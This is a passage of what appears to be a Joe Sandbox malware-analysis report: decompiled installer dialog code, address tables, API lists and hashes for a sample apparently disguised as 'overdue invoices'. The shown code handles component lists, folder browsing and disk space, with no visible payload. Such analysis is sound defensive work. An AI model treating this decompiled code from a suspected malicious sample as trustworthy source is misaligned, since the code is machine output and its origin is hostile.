									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423eb8; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420474;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42048c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420474 = _t315;
									 *0x42048c = _t315;
									 *0x423f00 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423eb9 & 0x00000001;
										if(( *0x423eb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423ecc - _t315; // 0x3
										_v32 =  *0x42048c;
										_t196 =  *0x423ec8; // 0x55dd54
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42367c; // 0x563c02
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x55dd5c
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x55dd6c
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423ecc; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42048c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f00 = _a4;
					_t247 =  *0x423ecc; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423ecc - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423ecc; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                  0x00404790
                  0x00404796
                  0x00404798
                  0x0040479e
                  0x004047a4
                  0x004047a7
                  0x004047b1
                  0x004047ba
                  0x004047bd
                  0x004047c0
                  0x004049e8
                  0x004049e8
                  0x004049ef
                  0x00404a03
                  0x004049f1
                  0x004049f3
                  0x004049f6
                  0x004049f7
                  0x004049fe
                  0x004049fe
                  0x00404a06
                  0x00404a0f
                  0x00404a1a
                  0x00404a1a
                  0x00404a1d
                  0x00404a20
                  0x00404a2f
                  0x00404a2f
                  0x00404a36
                  0x00404aae
                  0x00404aae
                  0x00404ab1
                  0x00404ab3
                  0x00404ab6
                  0x00404abd
                  0x00404acb
                  0x00404acb
                  0x00404acd
                  0x00404ad0
                  0x00404ad7
                  0x00404ad9
                  0x00404add
                  0x00404afa
                  0x00404afe
                  0x00404afe
                  0x00404adf
                  0x00404aec
                  0x00404aec
                  0x00404add
                  0x00404ad7
                  0x00000000
                  0x00404ab1
                  0x00404a38
                  0x00404a3b
                  0x00404a46
                  0x00404a48
                  0x00404a4b
                  0x00404a52
                  0x00404a57
                  0x00404a59
                  0x00404a63
                  0x00404a63
                  0x00404a67
                  0x00404a69
                  0x00404a6c
                  0x00404a6e
                  0x00404a71
                  0x00404a87
                  0x00404a87
                  0x00404a73
                  0x00404a73
                  0x00404a79
                  0x00404a7b
                  0x00404a82
                  0x00404a7d
                  0x00404a7d
                  0x00404a7d
                  0x00404a7b
                  0x00404a8b
                  0x00404a8d
                  0x00404a92
                  0x00404a9b
                  0x00404a9c
                  0x00404aa6
                  0x00404aa6
                  0x00404aa8
                  0x00404aab
                  0x00404aab
                  0x00404a6c
                  0x00000000
                  0x00404a59
                  0x00404a3d
                  0x00404a40
                  0x00404a44
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404a44
                  0x00404a22
                  0x00404a29
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404a11
                  0x00404a11
                  0x00404a14
                  0x00404b01
                  0x00404b01
                  0x00404b08
                  0x00404b7c
                  0x00404b7c
                  0x00404b83
                  0x00404b8f
                  0x00404b8f
                  0x00404b91
                  0x00404b98
                  0x00404b9a
                  0x00404b9f
                  0x00404ba1
                  0x00404ba4
                  0x00404ba4
                  0x00404baa
                  0x00404baf
                  0x00404bb1
                  0x00404bb4
                  0x00404bb4
                  0x00404bba
                  0x00404bc0
                  0x00404bc6
                  0x00404bc6
                  0x00404bcc
                  0x00404bd3
                  0x00404d20
                  0x00404d20
                  0x00404d27
                  0x00404d29
                  0x00404d30
                  0x00404d34
                  0x00404d41
                  0x00404d41
                  0x00404d44
                  0x00404d4a
                  0x00404d5c
                  0x00404d5c
                  0x00404d30
                  0x00000000
                  0x00404bd9
                  0x00404bdb
                  0x00404be0
                  0x00404be3
                  0x00404be7
                  0x00404be7
                  0x00404bec
                  0x00404bef
                  0x00404c30
                  0x00404c32
                  0x00404c3c
                  0x00404c42
                  0x00404c45
                  0x00404c4a
                  0x00404c51
                  0x00404c54
                  0x00404cf6
                  0x00404cfc
                  0x00404d02
                  0x00404d07
                  0x00404d0a
                  0x00404d1b
                  0x00404d1b
                  0x00000000
                  0x00404c5a
                  0x00404c5a
                  0x00404c5a
                  0x00404c5d
                  0x00404c63
                  0x00404c66
                  0x00404c68
                  0x00404c6a
                  0x00404c6c
                  0x00404c6f
                  0x00404c72
                  0x00404c79
                  0x00404c7b
                  0x00404c7e
                  0x00404c85
                  0x00404c88
                  0x00404c88
                  0x00404c88
                  0x00404c88
                  0x00404c8c
                  0x00404c8f
                  0x00404c9b
                  0x00404c9c
                  0x00404c9f
                  0x00404ca1
                  0x00404ca1
                  0x00404ca1
                  0x00404c91
                  0x00404c93
                  0x00404c93
                  0x00404cc0
                  0x00404cc0
                  0x00404cc1
                  0x00404ccd
                  0x00404cdc
                  0x00404cdc
                  0x00404cde
                  0x00404ce1
                  0x00404cea
                  0x00404cea
                  0x00000000
                  0x00404c5d
                  0x00404bf1
                  0x00404bfc
                  0x00404bff
                  0x00404c04
                  0x00404c06
                  0x00404c08
                  0x00404c0a
                  0x00404c1a
                  0x00404c24
                  0x00404c26
                  0x00404c29
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404c0c
                  0x00404c0c
                  0x00404c0c
                  0x00404c0f
                  0x00404c12
                  0x00404c14
                  0x00404c14
                  0x00404c14
                  0x00404c15
                  0x00404c16
                  0x00404c16
                  0x00000000
                  0x00404c0c
                  0x00404bef
                  0x00404bd3
                  0x00404b0a
                  0x00404b10
                  0x00000000
                  0x00000000
                  0x00404b1c
                  0x00404b20
                  0x00000000
                  0x00000000
                  0x00404b30
                  0x00404b32
                  0x00404b35
                  0x00000000
                  0x00000000
                  0x00404b47
                  0x00404b49
                  0x00404b4c
                  0x00404b56
                  0x00404b58
                  0x00404b59
                  0x00404b5a
                  0x00404b69
                  0x00404b6b
                  0x00404b72
                  0x00404b75
                  0x00000000
                  0x00404b75
                  0x00404b4e
                  0x00404b51
                  0x00404b54
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404b54
                  0x00000000
                  0x00404a14
                  0x004047c6
                  0x004047cb
                  0x004047d0
                  0x004047d5
                  0x004047d6
                  0x004047df
                  0x004047ea
                  0x004047f5
                  0x004047fb
                  0x00404809
                  0x0040481e
                  0x00404823
                  0x0040482e
                  0x00404837
                  0x0040484c
                  0x0040485d
                  0x0040486a
                  0x0040486a
                  0x0040486f
                  0x00404875
                  0x00404877
                  0x0040487a
                  0x0040487f
                  0x00404884
                  0x00404886
                  0x00404886
                  0x004048a6
                  0x004048a6
                  0x004048a8
                  0x004048a9
                  0x004048ae
                  0x004048b1
                  0x004048b4
                  0x004048b8
                  0x004048bd
                  0x004048c2
                  0x004048c6
                  0x004048cb
                  0x004048d0
                  0x004048d2
                  0x004048d4
                  0x004048da
                  0x004049a4
                  0x004049b7
                  0x00000000
                  0x004048e0
                  0x004048e3
                  0x004048e6
                  0x004048e9
                  0x004048e9
                  0x004048ef
                  0x004048f5
                  0x004048f8
                  0x004048fe
                  0x004048ff
                  0x00404904
                  0x0040490d
                  0x00404914
                  0x00404917
                  0x0040491a
                  0x0040491d
                  0x00404957
                  0x00404959
                  0x00404982
                  0x0040495b
                  0x00404968
                  0x00404968
                  0x0040491f
                  0x00404922
                  0x00404931
                  0x0040493b
                  0x00404943
                  0x0040494a
                  0x00404952
                  0x00404952
                  0x0040491d
                  0x00404988
                  0x00404989
                  0x0040498f
                  0x00404995
                  0x00404995
                  0x004049a2
                  0x004049bd
                  0x004049c1
                  0x004049de
                  0x004049e3
                  0x004049e6
                  0x004049e6
                  0x00000000
                  0x004049c3
                  0x004049c8
                  0x004049d1
                  0x00404d5e
                  0x00404d70
                  0x00404d70
                  0x004049c1
                  0x00000000
                  0x004049a2
                  0x004048da

                  APIs
                  • GetDlgItem.USER32 ref: 00404789
                  • GetDlgItem.USER32 ref: 00404796
                  • GlobalAlloc.KERNEL32(00000040,00000003), ref: 004047E2
                  • LoadBitmapA.USER32 ref: 004047F5
                  • SetWindowLongA.USER32 ref: 0040480F
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                  • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                  • DeleteObject.GDI32(?), ref: 0040486F
                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                  • GetWindowLongA.USER32 ref: 004049A9
                  • SetWindowLongA.USER32 ref: 004049B7
                  • ShowWindow.USER32(?,00000005), ref: 004049C8
                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                  • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                  • GlobalFree.KERNEL32 ref: 00404BB4
                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                  • ShowWindow.USER32(?,00000000), ref: 00404D4A
                  • GetDlgItem.USER32 ref: 00404D55
                  • ShowWindow.USER32(00000000), ref: 00404D5C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                  • String ID: $M$N
                  • API String ID: 1638840714-813528018
                  • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                  • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                  • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                  • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404275 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42367c; // 0x563c02
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t124 =  *0x423eb0; // 0x55dba8
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                  0x0040427b
                  0x00404282
                  0x0040428e
                  0x0040429c
                  0x004042a4
                  0x004042a8
                  0x004042ae
                  0x004042ae
                  0x004042ba
                  0x0040432e
                  0x00404335
                  0x0040440a
                  0x00404411
                  0x00404420
                  0x00404420
                  0x00404424
                  0x0040442a
                  0x00404437
                  0x00404439
                  0x00404439
                  0x00404447
                  0x0040444c
                  0x0040444f
                  0x00404456
                  0x00404459
                  0x00404490
                  0x00404492
                  0x00404498
                  0x0040449f
                  0x004044a1
                  0x004044a1
                  0x004044bd
                  0x004044f9
                  0x00000000
                  0x004044bf
                  0x004044c2
                  0x004044d6
                  0x004044d8
                  0x00000000
                  0x004044d8
                  0x0040445b
                  0x0040445f
                  0x0040448e
                  0x0040448e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404461
                  0x00404461
                  0x0040446e
                  0x00404473
                  0x00000000
                  0x00000000
                  0x00404477
                  0x00404479
                  0x00404479
                  0x00404484
                  0x00404487
                  0x0040448c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040448c
                  0x004044e7
                  0x004044ee
                  0x004044f5
                  0x004044fc
                  0x004044fc
                  0x00404501
                  0x00404503
                  0x0040450b
                  0x00404511
                  0x00404511
                  0x00404518
                  0x00404521
                  0x0040452b
                  0x00404533
                  0x00404549
                  0x00404535
                  0x00404539
                  0x00404539
                  0x00404533
                  0x0040454e
                  0x00404553
                  0x00404558
                  0x00404561
                  0x00404561
                  0x0040456a
                  0x0040456c
                  0x0040456c
                  0x00404578
                  0x00404580
                  0x0040458a
                  0x0040458a
                  0x0040458f
                  0x00000000
                  0x0040458f
                  0x00404459
                  0x00404413
                  0x0040441a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040441a
                  0x0040433b
                  0x00404341
                  0x0040435b
                  0x00404360
                  0x0040436a
                  0x00404371
                  0x00404380
                  0x00404383
                  0x00404386
                  0x0040438d
                  0x00404395
                  0x00404398
                  0x0040439c
                  0x004043a3
                  0x004043ab
                  0x00404403
                  0x004043ad
                  0x004043ae
                  0x004043b5
                  0x004043ba
                  0x004043bf
                  0x004043c7
                  0x004043d4
                  0x004043e8
                  0x004043ec
                  0x004043ec
                  0x004043e8
                  0x004043f1
                  0x004043fc
                  0x004043fc
                  0x004043ab
                  0x00000000
                  0x00404360
                  0x0040434e
                  0x00000000
                  0x00000000
                  0x00404354
                  0x00000000
                  0x004042bc
                  0x004042bc
                  0x004042c8
                  0x004042d2
                  0x004042df
                  0x004042df
                  0x004042e5
                  0x004042ee
                  0x004042f7
                  0x004042fa
                  0x004042fd
                  0x00404305
                  0x00404308
                  0x0040430b
                  0x00404313
                  0x0040431a
                  0x00404321
                  0x00404595
                  0x004045a7
                  0x004045a7
                  0x0040432c
                  0x00000000
                  0x0040432c

                  APIs
                  • GetDlgItem.USER32 ref: 004042C1
                  • SetWindowTextA.USER32(?,?), ref: 004042EE
                  • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                  • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                  • lstrcmpiA.KERNEL32(ijmyqjlf,00420498,00000000,?,?), ref: 004043E0
                  • lstrcatA.KERNEL32(?,ijmyqjlf), ref: 004043EC
                  • SetDlgItemTextA.USER32 ref: 004043FC
                    • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
